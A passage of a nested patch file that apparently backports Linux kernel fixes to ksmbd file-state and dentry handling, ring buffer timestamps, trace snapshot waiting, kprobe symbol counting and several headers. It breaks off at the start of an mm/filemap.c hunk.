+ struct dentry *ksmbd_vfs_kern_path_create(struct ksmbd_work *work,
+ 					  const char *name,
+ 					  unsigned int flags,
+@@ -131,8 +131,7 @@ struct file_allocated_range_buffer;
+ int ksmbd_vfs_fqar_lseek(struct ksmbd_file *fp, loff_t start, loff_t length,
+ 			 struct file_allocated_range_buffer *ranges,
+ 			 unsigned int in_count, unsigned int *out_count);
+-int ksmbd_vfs_unlink(struct user_namespace *user_ns,
+-		     struct dentry *dir, struct dentry *dentry);
++int ksmbd_vfs_unlink(struct file *filp);
+ void *ksmbd_vfs_init_kstat(char **p, struct ksmbd_kstat *ksmbd_kstat);
+ int ksmbd_vfs_fill_dentry_attrs(struct ksmbd_work *work,
+ 				struct user_namespace *user_ns,
+@@ -142,26 +141,27 @@ void ksmbd_vfs_posix_lock_wait(struct file_lock *flock);
+ int ksmbd_vfs_posix_lock_wait_timeout(struct file_lock *flock, long timeout);
+ void ksmbd_vfs_posix_lock_unblock(struct file_lock *flock);
+ int ksmbd_vfs_remove_acl_xattrs(struct user_namespace *user_ns,
+-				struct dentry *dentry);
+-int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns,
+-			       struct dentry *dentry);
++				const struct path *path);
++int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns, const struct path *path);
+ int ksmbd_vfs_set_sd_xattr(struct ksmbd_conn *conn,
+ 			   struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   struct smb_ntsd *pntsd, int len);
++			   const struct path *path,
++			   struct smb_ntsd *pntsd, int len,
++			   bool get_write);
+ int ksmbd_vfs_get_sd_xattr(struct ksmbd_conn *conn,
+ 			   struct user_namespace *user_ns,
+ 			   struct dentry *dentry,
+ 			   struct smb_ntsd **pntsd);
+ int ksmbd_vfs_set_dos_attrib_xattr(struct user_namespace *user_ns,
+-				   struct dentry *dentry,
+-				   struct xattr_dos_attrib *da);
++				   const struct path *path,
++				   struct xattr_dos_attrib *da,
++				   bool get_write);
+ int ksmbd_vfs_get_dos_attrib_xattr(struct user_namespace *user_ns,
+ 				   struct dentry *dentry,
+ 				   struct xattr_dos_attrib *da);
+ int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
+-				 struct inode *inode);
++				 struct path *path);
+ int ksmbd_vfs_inherit_posix_acl(struct user_namespace *user_ns,
+-				struct inode *inode,
++				struct path *path,
+ 				struct inode *parent_inode);
+ #endif /* __KSMBD_VFS_H__ */
+diff --git a/fs/smb/server/vfs_cache.c b/fs/smb/server/vfs_cache.c
+index 6ec6c129465d3..2528ce8aeebbe 100644
+--- a/fs/smb/server/vfs_cache.c
++++ b/fs/smb/server/vfs_cache.c
+@@ -65,14 +65,14 @@ static unsigned long inode_hash(struct super_block *sb, unsigned long hashval)
+ 	return tmp & inode_hash_mask;
+ }
+ 
+-static struct ksmbd_inode *__ksmbd_inode_lookup(struct inode *inode)
++static struct ksmbd_inode *__ksmbd_inode_lookup(struct dentry *de)
+ {
+ 	struct hlist_head *head = inode_hashtable +
+-		inode_hash(inode->i_sb, inode->i_ino);
++		inode_hash(d_inode(de)->i_sb, (unsigned long)de);
+ 	struct ksmbd_inode *ci = NULL, *ret_ci = NULL;
+ 
+ 	hlist_for_each_entry(ci, head, m_hash) {
+-		if (ci->m_inode == inode) {
++		if (ci->m_de == de) {
+ 			if (atomic_inc_not_zero(&ci->m_count))
+ 				ret_ci = ci;
+ 			break;
+@@ -83,26 +83,27 @@ static struct ksmbd_inode *__ksmbd_inode_lookup(struct inode *inode)
+ 
+ static struct ksmbd_inode *ksmbd_inode_lookup(struct ksmbd_file *fp)
+ {
+-	return __ksmbd_inode_lookup(file_inode(fp->filp));
++	return __ksmbd_inode_lookup(fp->filp->f_path.dentry);
+ }
+ 
+-static struct ksmbd_inode *ksmbd_inode_lookup_by_vfsinode(struct inode *inode)
++struct ksmbd_inode *ksmbd_inode_lookup_lock(struct dentry *d)
+ {
+ 	struct ksmbd_inode *ci;
+ 
+ 	read_lock(&inode_hash_lock);
+-	ci = __ksmbd_inode_lookup(inode);
++	ci = __ksmbd_inode_lookup(d);
+ 	read_unlock(&inode_hash_lock);
++
+ 	return ci;
+ }
+ 
+-int ksmbd_query_inode_status(struct inode *inode)
++int ksmbd_query_inode_status(struct dentry *dentry)
+ {
+ 	struct ksmbd_inode *ci;
+ 	int ret = KSMBD_INODE_STATUS_UNKNOWN;
+ 
+ 	read_lock(&inode_hash_lock);
+-	ci = __ksmbd_inode_lookup(inode);
++	ci = __ksmbd_inode_lookup(dentry);
+ 	if (ci) {
+ 		ret = KSMBD_INODE_STATUS_OK;
+ 		if (ci->m_flags & (S_DEL_PENDING | S_DEL_ON_CLS))
+@@ -142,7 +143,7 @@ void ksmbd_fd_set_delete_on_close(struct ksmbd_file *fp,
+ static void ksmbd_inode_hash(struct ksmbd_inode *ci)
+ {
+ 	struct hlist_head *b = inode_hashtable +
+-		inode_hash(ci->m_inode->i_sb, ci->m_inode->i_ino);
++		inode_hash(d_inode(ci->m_de)->i_sb, (unsigned long)ci->m_de);
+ 
+ 	hlist_add_head(&ci->m_hash, b);
+ }
+@@ -156,7 +157,6 @@ static void ksmbd_inode_unhash(struct ksmbd_inode *ci)
+ 
+ static int ksmbd_inode_init(struct ksmbd_inode *ci, struct ksmbd_file *fp)
+ {
+-	ci->m_inode = file_inode(fp->filp);
+ 	atomic_set(&ci->m_count, 1);
+ 	atomic_set(&ci->op_count, 0);
+ 	atomic_set(&ci->sop_count, 0);
+@@ -165,6 +165,7 @@ static int ksmbd_inode_init(struct ksmbd_inode *ci, struct ksmbd_file *fp)
+ 	INIT_LIST_HEAD(&ci->m_fp_list);
+ 	INIT_LIST_HEAD(&ci->m_op_list);
+ 	rwlock_init(&ci->m_lock);
++	ci->m_de = fp->filp->f_path.dentry;
+ 	return 0;
+ }
+ 
+@@ -208,7 +209,7 @@ static void ksmbd_inode_free(struct ksmbd_inode *ci)
+ 	kfree(ci);
+ }
+ 
+-static void ksmbd_inode_put(struct ksmbd_inode *ci)
++void ksmbd_inode_put(struct ksmbd_inode *ci)
+ {
+ 	if (atomic_dec_and_test(&ci->m_count))
+ 		ksmbd_inode_free(ci);
+@@ -243,7 +244,6 @@ void ksmbd_release_inode_hash(void)
+ 
+ static void __ksmbd_inode_close(struct ksmbd_file *fp)
+ {
+-	struct dentry *dir, *dentry;
+ 	struct ksmbd_inode *ci = fp->f_ci;
+ 	int err;
+ 	struct file *filp;
+@@ -252,7 +252,7 @@ static void __ksmbd_inode_close(struct ksmbd_file *fp)
+ 	if (ksmbd_stream_fd(fp) && (ci->m_flags & S_DEL_ON_CLS_STREAM)) {
+ 		ci->m_flags &= ~S_DEL_ON_CLS_STREAM;
+ 		err = ksmbd_vfs_remove_xattr(file_mnt_user_ns(filp),
+-					     filp->f_path.dentry,
++					     &filp->f_path,
+ 					     fp->stream.name);
+ 		if (err)
+ 			pr_err("remove xattr failed : %s\n",
+@@ -262,11 +262,9 @@ static void __ksmbd_inode_close(struct ksmbd_file *fp)
+ 	if (atomic_dec_and_test(&ci->m_count)) {
+ 		write_lock(&ci->m_lock);
+ 		if (ci->m_flags & (S_DEL_ON_CLS | S_DEL_PENDING)) {
+-			dentry = filp->f_path.dentry;
+-			dir = dentry->d_parent;
+ 			ci->m_flags &= ~(S_DEL_ON_CLS | S_DEL_PENDING);
+ 			write_unlock(&ci->m_lock);
+-			ksmbd_vfs_unlink(file_mnt_user_ns(filp), dir, dentry);
++			ksmbd_vfs_unlink(filp);
+ 			write_lock(&ci->m_lock);
+ 		}
+ 		write_unlock(&ci->m_lock);
+@@ -335,6 +333,9 @@ static void __ksmbd_close_fd(struct ksmbd_file_table *ft, struct ksmbd_file *fp)
+ 
+ static struct ksmbd_file *ksmbd_fp_get(struct ksmbd_file *fp)
+ {
++	if (fp->f_state != FP_INITED)
++		return NULL;
++
+ 	if (!atomic_inc_not_zero(&fp->refcount))
+ 		return NULL;
+ 	return fp;
+@@ -384,15 +385,20 @@ int ksmbd_close_fd(struct ksmbd_work *work, u64 id)
+ 		return 0;
+ 
+ 	ft = &work->sess->file_table;
+-	read_lock(&ft->lock);
++	write_lock(&ft->lock);
+ 	fp = idr_find(ft->idr, id);
+ 	if (fp) {
+ 		set_close_state_blocked_works(fp);
+ 
+-		if (!atomic_dec_and_test(&fp->refcount))
++		if (fp->f_state != FP_INITED)
+ 			fp = NULL;
++		else {
++			fp->f_state = FP_CLOSED;
++			if (!atomic_dec_and_test(&fp->refcount))
++				fp = NULL;
++		}
+ 	}
+-	read_unlock(&ft->lock);
++	write_unlock(&ft->lock);
+ 
+ 	if (!fp)
+ 		return -EINVAL;
+@@ -482,12 +488,15 @@ struct ksmbd_file *ksmbd_lookup_fd_cguid(char *cguid)
+ 	return fp;
+ }
+ 
+-struct ksmbd_file *ksmbd_lookup_fd_inode(struct inode *inode)
++struct ksmbd_file *ksmbd_lookup_fd_inode(struct dentry *dentry)
+ {
+ 	struct ksmbd_file	*lfp;
+ 	struct ksmbd_inode	*ci;
++	struct inode		*inode = d_inode(dentry);
+ 
+-	ci = ksmbd_inode_lookup_by_vfsinode(inode);
++	read_lock(&inode_hash_lock);
++	ci = __ksmbd_inode_lookup(dentry);
++	read_unlock(&inode_hash_lock);
+ 	if (!ci)
+ 		return NULL;
+ 
+@@ -572,6 +581,7 @@ struct ksmbd_file *ksmbd_open_fd(struct ksmbd_work *work, struct file *filp)
+ 	fp->tcon		= work->tcon;
+ 	fp->volatile_id		= KSMBD_NO_FID;
+ 	fp->persistent_id	= KSMBD_NO_FID;
++	fp->f_state		= FP_NEW;
+ 	fp->f_ci		= ksmbd_inode_get(fp);
+ 
+ 	if (!fp->f_ci) {
+@@ -593,6 +603,17 @@ err_out:
+ 	return ERR_PTR(ret);
+ }
+ 
++void ksmbd_update_fstate(struct ksmbd_file_table *ft, struct ksmbd_file *fp,
++			 unsigned int state)
++{
++	if (!fp)
++		return;
++
++	write_lock(&ft->lock);
++	fp->f_state = state;
++	write_unlock(&ft->lock);
++}
++
+ static int
+ __close_file_table_ids(struct ksmbd_file_table *ft,
+ 		       struct ksmbd_tree_connect *tcon,
+diff --git a/fs/smb/server/vfs_cache.h b/fs/smb/server/vfs_cache.h
+index fcb13413fa8d9..a528f0cc775ae 100644
+--- a/fs/smb/server/vfs_cache.h
++++ b/fs/smb/server/vfs_cache.h
+@@ -51,7 +51,7 @@ struct ksmbd_inode {
+ 	atomic_t			op_count;
+ 	/* opinfo count for streams */
+ 	atomic_t			sop_count;
+-	struct inode			*m_inode;
++	struct dentry			*m_de;
+ 	unsigned int			m_flags;
+ 	struct hlist_node		m_hash;
+ 	struct list_head		m_fp_list;
+@@ -60,6 +60,12 @@ struct ksmbd_inode {
+ 	__le32				m_fattr;
+ };
+ 
++enum {
++	FP_NEW = 0,
++	FP_INITED,
++	FP_CLOSED
++};
++
+ struct ksmbd_file {
+ 	struct file			*filp;
+ 	u64				persistent_id;
+@@ -98,6 +104,8 @@ struct ksmbd_file {
+ 	/* if ls is happening on directory, below is valid*/
+ 	struct ksmbd_readdir_data	readdir_data;
+ 	int				dot_dotdot[2];
++	unsigned int			f_state;
++	bool				reserve_lease_break;
+ };
+ 
+ static inline void set_ctx_actor(struct dir_context *ctx,
+@@ -131,9 +139,11 @@ struct ksmbd_file *ksmbd_lookup_foreign_fd(struct ksmbd_work *work, u64 id);
+ struct ksmbd_file *ksmbd_lookup_fd_slow(struct ksmbd_work *work, u64 id,
+ 					u64 pid);
+ void ksmbd_fd_put(struct ksmbd_work *work, struct ksmbd_file *fp);
++struct ksmbd_inode *ksmbd_inode_lookup_lock(struct dentry *d);
++void ksmbd_inode_put(struct ksmbd_inode *ci);
+ struct ksmbd_file *ksmbd_lookup_durable_fd(unsigned long long id);
+ struct ksmbd_file *ksmbd_lookup_fd_cguid(char *cguid);
+-struct ksmbd_file *ksmbd_lookup_fd_inode(struct inode *inode);
++struct ksmbd_file *ksmbd_lookup_fd_inode(struct dentry *dentry);
+ unsigned int ksmbd_open_durable_fd(struct ksmbd_file *fp);
+ struct ksmbd_file *ksmbd_open_fd(struct ksmbd_work *work, struct file *filp);
+ void ksmbd_close_tree_conn_fds(struct ksmbd_work *work);
+@@ -142,6 +152,8 @@ int ksmbd_close_inode_fds(struct ksmbd_work *work, struct inode *inode);
+ int ksmbd_init_global_file_table(void);
+ void ksmbd_free_global_file_table(void);
+ void ksmbd_set_fd_limit(unsigned long limit);
++void ksmbd_update_fstate(struct ksmbd_file_table *ft, struct ksmbd_file *fp,
++			 unsigned int state);
+ 
+ /*
+  * INODE hash
+@@ -155,7 +167,7 @@ enum KSMBD_INODE_STATUS {
+ 	KSMBD_INODE_STATUS_PENDING_DELETE,
+ };
+ 
+-int ksmbd_query_inode_status(struct inode *inode);
++int ksmbd_query_inode_status(struct dentry *dentry);
+ bool ksmbd_inode_pending_delete(struct ksmbd_file *fp);
+ void ksmbd_set_inode_pending_delete(struct ksmbd_file *fp);
+ void ksmbd_clear_inode_pending_delete(struct ksmbd_file *fp);
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 57674b3c58774..07a7eeef47d39 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -565,7 +565,7 @@ struct request_queue {
+ #define QUEUE_FLAG_NOXMERGES	9	/* No extended merges */
+ #define QUEUE_FLAG_ADD_RANDOM	10	/* Contributes to random pool */
+ #define QUEUE_FLAG_SAME_FORCE	12	/* force complete on same CPU */
+-#define QUEUE_FLAG_HW_WC	18	/* Write back caching supported */
++#define QUEUE_FLAG_HW_WC	13	/* Write back caching supported */
+ #define QUEUE_FLAG_INIT_DONE	14	/* queue is initialized */
+ #define QUEUE_FLAG_STABLE_WRITES 15	/* don't modify blks until WB is done */
+ #define QUEUE_FLAG_POLL		16	/* IO polling enabled if set */
+diff --git a/include/linux/export-internal.h b/include/linux/export-internal.h
+index fe7e6ba918f10..29de29af9546c 100644
+--- a/include/linux/export-internal.h
++++ b/include/linux/export-internal.h
+@@ -12,6 +12,7 @@
+ 
+ #define SYMBOL_CRC(sym, crc, sec)   \
+ 	asm(".section \"___kcrctab" sec "+" #sym "\",\"a\""	"\n" \
++	    ".balign 4"						"\n" \
+ 	    "__crc_" #sym ":"					"\n" \
+ 	    ".long " #crc					"\n" \
+ 	    ".previous"						"\n")
+diff --git a/include/linux/module.h b/include/linux/module.h
+index ec61fb53979a9..35876e89eb93f 100644
+--- a/include/linux/module.h
++++ b/include/linux/module.h
+@@ -879,8 +879,17 @@ static inline bool module_sig_ok(struct module *module)
+ }
+ #endif	/* CONFIG_MODULE_SIG */
+ 
++#if defined(CONFIG_MODULES) && defined(CONFIG_KALLSYMS)
+ int module_kallsyms_on_each_symbol(int (*fn)(void *, const char *,
+ 					     struct module *, unsigned long),
+ 				   void *data);
++#else
++static inline int module_kallsyms_on_each_symbol(int (*fn)(void *, const char *,
++						 struct module *, unsigned long),
++						 void *data)
++{
++	return -EOPNOTSUPP;
++}
++#endif  /* CONFIG_MODULES && CONFIG_KALLSYMS */
+ 
+ #endif /* _LINUX_MODULE_H */
+diff --git a/include/linux/namei.h b/include/linux/namei.h
+index 00fee52df8423..5c0149603dc3d 100644
+--- a/include/linux/namei.h
++++ b/include/linux/namei.h
+@@ -57,12 +57,18 @@ static inline int user_path_at(int dfd, const char __user *name, unsigned flags,
+ 	return user_path_at_empty(dfd, name, flags, path, NULL);
+ }
+ 
++struct dentry *lookup_one_qstr_excl(const struct qstr *name,
++				    struct dentry *base,
++				    unsigned int flags);
+ extern int kern_path(const char *, unsigned, struct path *);
+ 
+ extern struct dentry *kern_path_create(int, const char *, struct path *, unsigned int);
+ extern struct dentry *user_path_create(int, const char __user *, struct path *, unsigned int);
+ extern void done_path_create(struct path *, struct dentry *);
+ extern struct dentry *kern_path_locked(const char *, struct path *);
++int vfs_path_parent_lookup(struct filename *filename, unsigned int flags,
++			   struct path *parent, struct qstr *last, int *type,
++			   const struct path *root);
+ 
+ extern struct dentry *try_lookup_one_len(const char *, struct dentry *, int);
+ extern struct dentry *lookup_one_len(const char *, struct dentry *, int);
+@@ -81,6 +87,7 @@ extern int follow_down(struct path *);
+ extern int follow_up(struct path *);
+ 
+ extern struct dentry *lock_rename(struct dentry *, struct dentry *);
++extern struct dentry *lock_rename_child(struct dentry *, struct dentry *);
+ extern void unlock_rename(struct dentry *, struct dentry *);
+ 
+ extern int __must_check nd_jump_link(const struct path *path);
+diff --git a/include/linux/property.h b/include/linux/property.h
+index 117cc200c656d..587b5b666b5bb 100644
+--- a/include/linux/property.h
++++ b/include/linux/property.h
+@@ -32,7 +32,12 @@ enum dev_dma_attr {
+ 	DEV_DMA_COHERENT,
+ };
+ 
+-struct fwnode_handle *dev_fwnode(const struct device *dev);
++const struct fwnode_handle *__dev_fwnode_const(const struct device *dev);
++struct fwnode_handle *__dev_fwnode(struct device *dev);
++#define dev_fwnode(dev)							\
++	_Generic((dev),							\
++		 const struct device *: __dev_fwnode_const,	\
++		 struct device *: __dev_fwnode)(dev)
+ 
+ bool device_property_present(struct device *dev, const char *propname);
+ int device_property_read_u8_array(struct device *dev, const char *propname,
+diff --git a/include/linux/spi/spi.h b/include/linux/spi/spi.h
+index 877395e075afe..8e9054d9f6df0 100644
+--- a/include/linux/spi/spi.h
++++ b/include/linux/spi/spi.h
+@@ -263,6 +263,26 @@ static inline void *spi_get_drvdata(struct spi_device *spi)
+ 	return dev_get_drvdata(&spi->dev);
+ }
+ 
++static inline u8 spi_get_chipselect(const struct spi_device *spi, u8 idx)
++{
++	return spi->chip_select;
++}
++
++static inline void spi_set_chipselect(struct spi_device *spi, u8 idx, u8 chipselect)
++{
++	spi->chip_select = chipselect;
++}
++
++static inline struct gpio_desc *spi_get_csgpiod(const struct spi_device *spi, u8 idx)
++{
++	return spi->cs_gpiod;
++}
++
++static inline void spi_set_csgpiod(struct spi_device *spi, u8 idx, struct gpio_desc *csgpiod)
++{
++	spi->cs_gpiod = csgpiod;
++}
++
+ struct spi_message;
+ 
+ /**
+@@ -1515,6 +1535,9 @@ extern void spi_unregister_device(struct spi_device *spi);
+ extern const struct spi_device_id *
+ spi_get_device_id(const struct spi_device *sdev);
+ 
++extern const void *
++spi_get_device_match_data(const struct spi_device *sdev);
++
+ static inline bool
+ spi_transfer_is_last(struct spi_controller *ctlr, struct spi_transfer *xfer)
+ {
+diff --git a/kernel/module/kallsyms.c b/kernel/module/kallsyms.c
+index f5c5c9175333d..4523f99b03589 100644
+--- a/kernel/module/kallsyms.c
++++ b/kernel/module/kallsyms.c
+@@ -494,7 +494,6 @@ unsigned long module_kallsyms_lookup_name(const char *name)
+ 	return ret;
+ }
+ 
+-#ifdef CONFIG_LIVEPATCH
+ int module_kallsyms_on_each_symbol(int (*fn)(void *, const char *,
+ 					     struct module *, unsigned long),
+ 				   void *data)
+@@ -531,4 +530,3 @@ out:
+ 	mutex_unlock(&module_mutex);
+ 	return ret;
+ }
+-#endif /* CONFIG_LIVEPATCH */
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 61803208706a5..06d52525407b8 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -705,48 +705,6 @@ rb_time_read_cmpxchg(local_t *l, unsigned long expect, unsigned long set)
+ 	return ret == expect;
+ }
+ 
+-static int rb_time_cmpxchg(rb_time_t *t, u64 expect, u64 set)
+-{
+-	unsigned long cnt, top, bottom, msb;
+-	unsigned long cnt2, top2, bottom2, msb2;
+-	u64 val;
+-
+-	/* Any interruptions in this function should cause a failure */
+-	cnt = local_read(&t->cnt);
+-
+-	/* The cmpxchg always fails if it interrupted an update */
+-	 if (!__rb_time_read(t, &val, &cnt2))
+-		 return false;
+-
+-	 if (val != expect)
+-		 return false;
+-
+-	 if ((cnt & 3) != cnt2)
+-		 return false;
+-
+-	 cnt2 = cnt + 1;
+-
+-	 rb_time_split(val, &top, &bottom, &msb);
+-	 msb = rb_time_val_cnt(msb, cnt);
+-	 top = rb_time_val_cnt(top, cnt);
+-	 bottom = rb_time_val_cnt(bottom, cnt);
+-
+-	 rb_time_split(set, &top2, &bottom2, &msb2);
+-	 msb2 = rb_time_val_cnt(msb2, cnt);
+-	 top2 = rb_time_val_cnt(top2, cnt2);
+-	 bottom2 = rb_time_val_cnt(bottom2, cnt2);
+-
+-	if (!rb_time_read_cmpxchg(&t->cnt, cnt, cnt2))
+-		return false;
+-	if (!rb_time_read_cmpxchg(&t->msb, msb, msb2))
+-		return false;
+-	if (!rb_time_read_cmpxchg(&t->top, top, top2))
+-		return false;
+-	if (!rb_time_read_cmpxchg(&t->bottom, bottom, bottom2))
+-		return false;
+-	return true;
+-}
+-
+ #else /* 64 bits */
+ 
+ /* local64_t always succeeds */
+@@ -760,13 +718,6 @@ static void rb_time_set(rb_time_t *t, u64 val)
+ {
+ 	local64_set(&t->time, val);
+ }
+-
+-static bool rb_time_cmpxchg(rb_time_t *t, u64 expect, u64 set)
+-{
+-	u64 val;
+-	val = local64_cmpxchg(&t->time, expect, set);
+-	return val == expect;
+-}
+ #endif
+ 
+ /*
+@@ -935,9 +886,14 @@ static __always_inline bool full_hit(struct trace_buffer *buffer, int cpu, int f
+ 	if (!nr_pages || !full)
+ 		return true;
+ 
+-	dirty = ring_buffer_nr_dirty_pages(buffer, cpu);
++	/*
++	 * Add one as dirty will never equal nr_pages, as the sub-buffer
++	 * that the writer is on is not counted as dirty.
++	 * This is needed if "buffer_percent" is set to 100.
++	 */
++	dirty = ring_buffer_nr_dirty_pages(buffer, cpu) + 1;
+ 
+-	return (dirty * 100) > (full * nr_pages);
++	return (dirty * 100) >= (full * nr_pages);
+ }
+ 
+ /*
+@@ -997,7 +953,8 @@ void ring_buffer_wake_waiters(struct trace_buffer *buffer, int cpu)
+ 	/* make sure the waiters see the new index */
+ 	smp_wmb();
+ 
+-	rb_wake_up_waiters(&rbwork->work);
++	/* This can be called in any context */
++	irq_work_queue(&rbwork->work);
+ }
+ 
+ /**
+@@ -2981,25 +2938,6 @@ static unsigned rb_calculate_event_length(unsigned length)
+ 	return length;
+ }
+ 
+-static u64 rb_time_delta(struct ring_buffer_event *event)
+-{
+-	switch (event->type_len) {
+-	case RINGBUF_TYPE_PADDING:
+-		return 0;
+-
+-	case RINGBUF_TYPE_TIME_EXTEND:
+-		return rb_event_time_stamp(event);
+-
+-	case RINGBUF_TYPE_TIME_STAMP:
+-		return 0;
+-
+-	case RINGBUF_TYPE_DATA:
+-		return event->time_delta;
+-	default:
+-		return 0;
+-	}
+-}
+-
+ static inline int
+ rb_try_to_discard(struct ring_buffer_per_cpu *cpu_buffer,
+ 		  struct ring_buffer_event *event)
+@@ -3008,8 +2946,6 @@ rb_try_to_discard(struct ring_buffer_per_cpu *cpu_buffer,
+ 	struct buffer_page *bpage;
+ 	unsigned long index;
+ 	unsigned long addr;
+-	u64 write_stamp;
+-	u64 delta;
+ 
+ 	new_index = rb_event_index(event);
+ 	old_index = new_index + rb_event_ts_length(event);
+@@ -3018,14 +2954,10 @@ rb_try_to_discard(struct ring_buffer_per_cpu *cpu_buffer,
+ 
+ 	bpage = READ_ONCE(cpu_buffer->tail_page);
+ 
+-	delta = rb_time_delta(event);
+-
+-	if (!rb_time_read(&cpu_buffer->write_stamp, &write_stamp))
+-		return 0;
+-
+-	/* Make sure the write stamp is read before testing the location */
+-	barrier();
+-
++	/*
++	 * Make sure the tail_page is still the same and
++	 * the next write location is the end of this event
++	 */
+ 	if (bpage->page == (void *)addr && rb_page_write(bpage) == old_index) {
+ 		unsigned long write_mask =
+ 			local_read(&bpage->write) & ~RB_WRITE_MASK;
+@@ -3036,20 +2968,20 @@ rb_try_to_discard(struct ring_buffer_per_cpu *cpu_buffer,
+ 		 * to make sure that the next event adds an absolute
+ 		 * value and does not rely on the saved write stamp, which
+ 		 * is now going to be bogus.
++		 *
++		 * By setting the before_stamp to zero, the next event
++		 * is not going to use the write_stamp and will instead
++		 * create an absolute timestamp. This means there's no
++		 * reason to update the wirte_stamp!
+ 		 */
+ 		rb_time_set(&cpu_buffer->before_stamp, 0);
+ 
+-		/* Something came in, can't discard */
+-		if (!rb_time_cmpxchg(&cpu_buffer->write_stamp,
+-				       write_stamp, write_stamp - delta))
+-			return 0;
+-
+ 		/*
+ 		 * If an event were to come in now, it would see that the
+ 		 * write_stamp and the before_stamp are different, and assume
+ 		 * that this event just added itself before updating
+ 		 * the write stamp. The interrupting event will fix the
+-		 * write stamp for us, and use the before stamp as its delta.
++		 * write stamp for us, and use an absolute timestamp.
+ 		 */
+ 
+ 		/*
+@@ -3488,7 +3420,7 @@ static void check_buffer(struct ring_buffer_per_cpu *cpu_buffer,
+ 		return;
+ 
+ 	/*
+-	 * If this interrupted another event, 
++	 * If this interrupted another event,
+ 	 */
+ 	if (atomic_inc_return(this_cpu_ptr(&checking)) != 1)
+ 		goto out;
+@@ -3632,20 +3564,36 @@ __rb_reserve_next(struct ring_buffer_per_cpu *cpu_buffer,
+ 	} else {
+ 		u64 ts;
+ 		/* SLOW PATH - Interrupted between A and C */
+-		a_ok = rb_time_read(&cpu_buffer->write_stamp, &info->after);
+-		/* Was interrupted before here, write_stamp must be valid */
++
++		/* Save the old before_stamp */
++		a_ok = rb_time_read(&cpu_buffer->before_stamp, &info->before);
+ 		RB_WARN_ON(cpu_buffer, !a_ok);
++
++		/*
++		 * Read a new timestamp and update the before_stamp to make
++		 * the next event after this one force using an absolute
++		 * timestamp. This is in case an interrupt were to come in
++		 * between E and F.
++		 */
+ 		ts = rb_time_stamp(cpu_buffer->buffer);
++		rb_time_set(&cpu_buffer->before_stamp, ts);
++
+ 		barrier();
+- /*E*/		if (write == (local_read(&tail_page->write) & RB_WRITE_MASK) &&
+-		    info->after < ts &&
+-		    rb_time_cmpxchg(&cpu_buffer->write_stamp,
+-				    info->after, ts)) {
+-			/* Nothing came after this event between C and E */
++ /*E*/		a_ok = rb_time_read(&cpu_buffer->write_stamp, &info->after);
++		/* Was interrupted before here, write_stamp must be valid */
++		RB_WARN_ON(cpu_buffer, !a_ok);
++		barrier();
++ /*F*/		if (write == (local_read(&tail_page->write) & RB_WRITE_MASK) &&
++		    info->after == info->before && info->after < ts) {
++			/*
++			 * Nothing came after this event between C and F, it is
++			 * safe to use info->after for the delta as it
++			 * matched info->before and is still valid.
++			 */
+ 			info->delta = ts - info->after;
+ 		} else {
+ 			/*
+-			 * Interrupted between C and E:
++			 * Interrupted between C and F:
+ 			 * Lost the previous events time stamp. Just set the
+ 			 * delta to zero, and this will be the same time as
+ 			 * the event this event interrupted. And the events that
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 87eca95b57fb3..deae65af76ecf 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -1850,6 +1850,9 @@ update_max_tr(struct trace_array *tr, struct task_struct *tsk, int cpu,
+ 	__update_max_tr(tr, tsk, cpu);
+ 
+ 	arch_spin_unlock(&tr->max_lock);
++
++	/* Any waiters on the old snapshot buffer need to wake up */
++	ring_buffer_wake_waiters(tr->array_buffer.buffer, RING_BUFFER_ALL_CPUS);
+ }
+ 
+ /**
+@@ -1901,12 +1904,23 @@ update_max_tr_single(struct trace_array *tr, struct task_struct *tsk, int cpu)
+ 
+ static int wait_on_pipe(struct trace_iterator *iter, int full)
+ {
++	int ret;
++
+ 	/* Iterators are static, they should be filled or empty */
+ 	if (trace_buffer_iter(iter, iter->cpu_file))
+ 		return 0;
+ 
+-	return ring_buffer_wait(iter->array_buffer->buffer, iter->cpu_file,
+-				full);
++	ret = ring_buffer_wait(iter->array_buffer->buffer, iter->cpu_file, full);
++
++#ifdef CONFIG_TRACER_MAX_TRACE
++	/*
++	 * Make sure this is still the snapshot buffer, as if a snapshot were
++	 * to happen, this would now be the main buffer.
++	 */
++	if (iter->snapshot)
++		iter->array_buffer = &iter->tr->max_buffer;
++#endif
++	return ret;
+ }
+ 
+ #ifdef CONFIG_FTRACE_STARTUP_TEST
+@@ -8433,7 +8447,7 @@ tracing_buffers_splice_read(struct file *file, loff_t *ppos,
+ 
+ 		wait_index = READ_ONCE(iter->wait_index);
+ 
+-		ret = wait_on_pipe(iter, iter->tr->buffer_percent);
++		ret = wait_on_pipe(iter, iter->snapshot ? 0 : iter->tr->buffer_percent);
+ 		if (ret)
+ 			goto out;
+ 
+diff --git a/kernel/trace/trace_kprobe.c b/kernel/trace/trace_kprobe.c
+index a34a4fcdab7b1..e3993d19687db 100644
+--- a/kernel/trace/trace_kprobe.c
++++ b/kernel/trace/trace_kprobe.c
+@@ -714,14 +714,31 @@ static int count_symbols(void *data, unsigned long unused)
+ 	return 0;
+ }
+ 
++struct sym_count_ctx {
++	unsigned int count;
++	const char *name;
++};
++
++static int count_mod_symbols(void *data, const char *name,
++			     struct module *module, unsigned long unused)
++{
++	struct sym_count_ctx *ctx = data;
++
++	if (strcmp(name, ctx->name) == 0)
++		ctx->count++;
++
++	return 0;
++}
++
+ static unsigned int number_of_same_symbols(char *func_name)
+ {
+-	unsigned int count;
++	struct sym_count_ctx ctx = { .count = 0, .name = func_name };
++
++	kallsyms_on_each_match_symbol(count_symbols, func_name, &ctx.count);
+ 
+-	count = 0;
+-	kallsyms_on_each_match_symbol(count_symbols, func_name, &count);
++	module_kallsyms_on_each_symbol(count_mod_symbols, &ctx);
+ 
+-	return count;
++	return ctx.count;
+ }
+ 
+ static int __trace_kprobe_create(int argc, const char *argv[])
+diff --git a/mm/filemap.c b/mm/filemap.c
+index d633ab8cd56f1..10fe6430693bd 100644
+--- a/mm/filemap.c
++++ b/mm/filemap.c
